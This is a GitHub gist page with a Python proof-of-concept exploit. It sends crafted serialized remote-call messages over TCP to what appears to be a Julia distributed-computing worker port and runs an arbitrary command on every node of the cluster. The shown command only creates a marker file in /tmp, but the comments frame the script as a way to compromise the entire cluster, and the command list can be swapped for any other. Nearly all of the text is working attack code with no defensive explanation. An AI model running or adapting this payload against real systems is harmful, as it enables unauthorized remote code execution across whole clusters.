Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import socket
import time
import struct
from random import randint
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(packet)
time.sleep(1)
s.close()
def encode_length(l):
if l <= 32:
return chr(l + 126)
else:
return "\x09" + struct.pack("<Q", l)
def serialize_command(parts):
data = "\x16"
data += chr(len(parts) + 1)
data += "=1\x1f\x02\x05tuple"
for part in parts:
data += "\x16\x02=1\x1f\x02\x05tuple&\x15"
data += encode_length(len(part))
data += part
return data
# Creates an empty file at /tmp/full_cluster_compromise_confirmed on every computer in the cluster (including the master)
command = ["touch", "/tmp/full_cluster_compromise_confirmed"]
# Build the payload to own the entire cluster in a single request to one node
part_0 = '\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00=\x13\x01"\n' + struct.pack(">I", int(time.time()))
part_1 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1U2\x151\x82\x151\x7f\x151\x81U2~\x151~\x86\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecall\x7f"\n' + struct.pack(">I", int(time.time()))
part_2 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1c2\x151\x82\x151\x84\x151\x81c2~\x151\x81\x02\x04#s242\x80\x151\x81\x02\x04#s232\x80\x151\x81\x02\x04#s222\x80\x151\x81d2\x90\x151\x81\x02\x03#s12\x80\x151~\x86\x151~\x16\x1e;1\x1a\x02\x04none\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/~\x16\x01=1\x11\x01\x02\tGlobalRef#s/#/\x02\x05procs\x16\x02?1\x11\x01\x02\x06GenSym#s/\x7f\x16\x02=1\x1f\x02\x06length\x11\x01\x02\x06GenSym#s/~\x1c~\x16\x02?1\x11\x01\x02\x06GenSym#s/\x81\x16\x03=1\x1f7\x16\x01\x02\rstatic_typeof1\x11\x01\x02\x06GenSym#s/\x82\x11\x01\x02\x06GenSym#s/\x7f\x16\x02?1\x02\x04#s24\x7f\x16\x02?1\x02\x04#s23\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/~\x16\x02?1\x02\x04#s22~\x16\x02A1\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x80\x1c\x81\x16\x02?1\x02\x04#s22\x16\x03=1\x1f\x02\x01+\x02\x04#s22\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/\x83\x16\x03=1\x1f\x02\x04next\x11\x01\x02\x06GenSym#s/~\x02\x04#s23\x16\x02?1\x02\x03#s1\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/\x83\x16\x02?1\x11\x01\x02\x06GenSym#s/\x84\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x7f\x02\x03#s1\x16\x02?1d\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x85\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x80\x02\x03#s1\x16\x02?1\x02\x04#s23\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x82\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecalld"\n' + struct.pack(">I", int(time.time()))
part_3 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1b2\x151\x82\x151\x7f\x151\x81b2~\x151~~\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x02=1\x11\x01\x02\tGlobalRef#s/#/\x02\x03run\x16\x02=1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07cmd_gen' + serialize_command(command) + '\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x16\x02\x02\ttype_goto1~\x11\x01\x02\x06GenSym#s/\x82\x16\x01\x02\x0bboundscheck1{\x16\x04=1\x1f\x02\tsetindex!\x11\x01\x02\x06GenSym#s/\x81\x11\x01\x02\x06GenSym#s/\x82\x02\x04#s24\x16\x01\x02\x0bboundscheck1\x11\x01\x02\tGlobalRef#s/#/\x02\x03pop\x16\x02?1\x02\x04#s24\x16\x03=1\x1f\x02\x01+\x02\x04#s24\x7f\x1c\x82\x16\x02A1\x16\x02=1\x1f\x02\x01!\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x81\x1c\x80\x1c\x7f\x16\x01<1\x11\x01\x02\x06GenSym#s/\x81\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x151~+\x00\x00\x00\x00{#/}+\x00\x00\x00\x00\x14\x01/\x14\x02\x7f' + encode_length(int(time.time()))
send_payload(part_0 + part_1 + part_2 + part_3)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.